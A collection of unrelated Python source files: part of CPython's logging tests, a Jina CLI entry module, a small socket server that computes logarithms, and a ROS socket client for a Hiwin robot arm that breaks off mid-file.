def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
blacklist = {'logThreads', 'logMultiprocessing',
'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger',
'root', 'threading'}
support.check__all__(self, logging, blacklist=blacklist)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
tests = [
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, IPv6SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest,
MiscTestCase
]
if hasattr(logging.handlers, 'QueueListener'):
tests.append(QueueListenerTest)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
__init__.py
|
import os
import sys
def _get_run_args(print_args: bool = True):
from jina.helper import get_rich_console
from jina.parsers import get_main_parser
console = get_rich_console()
silent_print = {'help', 'hub'}
parser = get_main_parser()
if len(sys.argv) > 1:
from argparse import _StoreAction, _StoreTrueAction
from rich import box
from rich.table import Table
args, unknown = parser.parse_known_args()
if unknown:
from jina.helper import warn_unknown_args
unknown = list(filter(lambda x: x.startswith('--'), unknown))
warn_unknown_args(unknown)
if args.cli not in silent_print and print_args:
from jina import __resources_path__
p = parser._actions[-1].choices[sys.argv[1]]
default_args = {
a.dest: a.default
for a in p._actions
if isinstance(a, (_StoreAction, _StoreTrueAction))
}
with open(os.path.join(__resources_path__, 'jina.logo')) as fp:
logo_str = fp.read()
param_str = Table(title=None, box=box.ROUNDED, highlight=True)
param_str.add_column('')
param_str.add_column('Parameters', justify='right')
param_str.add_column('Value', justify='left')
for k, v in sorted(vars(args).items()):
sign = ' ' if default_args.get(k, None) == v else '🔧️'
param = k.replace('_', '-')
value = str(v)
style = None if default_args.get(k, None) == v else 'blue on yellow'
param_str.add_row(sign, param, value, style=style)
print(f'\n{logo_str}\n')
console.print(f'▶️ {" ".join(sys.argv)}', param_str)
return args
else:
parser.print_help()
exit()
def _quick_ac_lookup():
from cli.autocomplete import ac_table
if len(sys.argv) > 1:
if sys.argv[1] == 'commands':
for k in ac_table['commands']:
print(k)
exit()
elif sys.argv[1] == 'completions':
# search with the longest shared prefix
for j in range(len(sys.argv), 2, -1):
_input = ' '.join(sys.argv[2:j]).strip()
if _input in ac_table['completions']:
compl = ac_table['completions'][_input]
for k in compl:
if k not in sys.argv:
print(k)
break
exit()
def _is_latest_version(suppress_on_error=True):
try:
import json
import warnings
from urllib.request import Request, urlopen
from jina import __version__
req = Request(
'https://api.jina.ai/latest', headers={'User-Agent': 'Mozilla/5.0'}
)
with urlopen(
req, timeout=5
) as resp: # 'with' is important to close the resource after use
latest_ver = json.load(resp)['version']
from packaging.version import Version
latest_ver = Version(latest_ver)
cur_ver = Version(__version__)
if cur_ver < latest_ver:
from jina.logging.predefined import default_logger
default_logger.warning(
f'You are using Jina version {cur_ver}, however version {latest_ver} is available. '
f'You should consider upgrading via the "pip install --upgrade jina" command.'
)
return False
return True
except:
# no network, two slow, api.jina.ai is down
if not suppress_on_error:
raise
def main():
"""The main entrypoint of the CLI """
_quick_ac_lookup()
from cli import api
args = _get_run_args()
# checking version info in another thread
import threading
threading.Thread(target=_is_latest_version, daemon=True).start()
getattr(api, args.cli.replace('-', '_'))(args)
|
log_server.py
|
import socket
import sys
import math
import lib.ProtocolUtils as protocolUtils
import threading as thread
def message_handler(conn, addr):
data = protocolUtils.MessageHandler(conn.recv(1024)).message_loads()
print("New operation in queue ", data[0], " ", data[2])
try:
val1 = float(data[0])
val2 = float(data[2])
except ValueError:
result = "The operands requires be numbers"
conn.send(result.encode())
raise
result = str(math.log(float(val1), float(val2)))
conn.send(result.encode())
# Close the thread to save hardware.
# sys.exit()
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9996))
socket_instance.listen(10)
threads_list = []
print("Add Server running ...")
while True:
conn, addr = socket_instance.accept()
temp_thread = thread.Thread(target=message_handler, args=(conn, addr,))
threads_list.append(temp_thread)
temp_thread.start()
|
HiwinRA605_socket_ros_test_20190626100830.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,Socket_sent_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if Socket_sent_flag == True:
Socket_sent_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
